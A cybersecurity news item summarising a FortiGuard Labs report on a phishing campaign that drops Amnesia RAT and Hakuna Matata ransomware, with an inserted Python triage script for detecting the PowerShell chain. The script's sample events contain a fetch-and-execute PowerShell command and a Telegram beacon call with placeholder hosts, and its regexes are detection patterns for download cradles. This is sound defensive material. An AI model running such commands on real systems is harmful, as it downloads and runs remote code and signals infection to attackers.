securityaffairs.com 1/27/2026, 10:15:57 AM · via preferred

Amnesia RAT deployed in multi-stage phishing attacks against Russian users


FortiGuard Labs researchers uncovered a multi-stage malware campaign primarily targeting users in Russia, using fake business documents as social engineering lures to distract victims while the malware operates in the background. The attack chain begins when a victim opens a compressed archive that appears to contain ordinary accounting files; a shortcut file inside it then runs PowerShell to download a script from GitHub. No exploits are required; the chain relies entirely on user interaction.

The loader script, kira.ps1, hides its window, creates a decoy document, and notifies the attacker via Telegram to confirm infection before pulling an obfuscated VBScript into memory. The main controller script rebuilds the real malicious code only in memory, using Base64 and RC4, to evade detection, and escalates privileges through repeated UAC prompts.
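The two paragraphs above describe a chain that leaves recognisable traces in process-creation telemetry: a user shell launching PowerShell with a hidden window, a download cradle fetching a script from GitHub, and an outbound call to the Telegram Bot API. The following triage script is an added example, not code from Security Affairs or from the FortiGuard report; the indicator patterns, field names and sample events are assumptions constructed here for illustration (the GitHub owner and repository names and the bot token are placeholders).

```python
"""
Heuristic triage of process-creation events for a lure-driven PowerShell chain:
shortcut -> hidden PowerShell -> script pulled from GitHub -> Telegram check-in.
Added example; indicator patterns and sample events are constructed assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon event ID 1)."""
    parent_image: str
    image: str
    command_line: str


# Regex indicators over the command line. Each is a loose heuristic, so a hit
# on its own is low-severity; the combination is what matters.
INDICATORS = {
    # -WindowStyle Hidden, -w hidden, -w h (PowerShell accepts prefix abbreviations)
    "hidden_window": re.compile(r"-w\w*\s+h(?:idden)?\b", re.I),
    # -ExecutionPolicy Bypass, -ep bypass
    "execpolicy_bypass": re.compile(r"-e\w*\s+bypass\b", re.I),
    # common download cradles
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b",
        re.I,
    ),
    # script hosted on GitHub (raw or gist)
    "github_hosted_script": re.compile(
        r"https?://(?:raw\.githubusercontent\.com|gist\.githubusercontent\.com|github\.com)/", re.I
    ),
    # Telegram Bot API used as an infection beacon
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
}

# Parents that indicate a user double-clicked something (assumption: explorer.exe only).
USER_SHELLS = {"explorer.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1].rsplit("/", 1)[-1]


def reasons_for(ev: ProcEvent) -> list[str]:
    """Return the list of indicator names that fire for one event."""
    hits = []
    if basename(ev.parent_image) in USER_SHELLS and basename(ev.image) in POWERSHELL:
        hits.append("user_shell_parent")
    for name, pattern in INDICATORS.items():
        if pattern.search(ev.command_line):
            hits.append(name)
    return hits


def severity(reasons: list[str]) -> str:
    n = len(reasons)
    return "high" if n >= 3 else "medium" if n == 2 else "low" if n == 1 else "none"


def triage(events: list[ProcEvent]) -> list[dict]:
    out = []
    for i, ev in enumerate(events):
        r = reasons_for(ev)
        out.append({"index": i, "severity": severity(r), "reasons": r})
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry: two malicious-looking events followed by two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell.exe -w hidden -ep bypass -c "iwr https://raw.githubusercontent.com/'
              'EXAMPLE-OWNER/EXAMPLE-REPO/main/kira.ps1 | iex"'),
    ProcEvent(PS, PS,
              'powershell.exe -w hidden -c "Invoke-RestMethod -Method Post -Uri '
              'https://api.telegram.org/botBOT-TOKEN-PLACEHOLDER/sendMessage -Body @{chat_id=0;text=infected}"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS,
              'powershell.exe -c "Invoke-WebRequest https://intranet.example/report.csv -OutFile report.csv"'),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['index']}: {r['severity']:6} {', '.join(r['reasons']) or '-'}")
```

Running the script scores the first two constructed events as high and the two benign ones as low, which is the intended behaviour: a hidden window or a download cradle alone is common in legitimate administration, so only the stacked indicators should page an analyst. In a real deployment the regexes would be tuned against the environment's own PowerShell baseline before the high tier is alerted on.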

In the final phase, Amnesia RAT is installed to maintain long-term control and steal data, including browser credentials, Telegram sessions, crypto wallets, and system information, with capabilities for screenshots and remote commands. Hakuna Matata ransomware is deployed alongside it to encrypt files and pressure victims through desktop locking and clipboard monitoring, according to the FortiGuard Labs report.


Article by CyberSIXT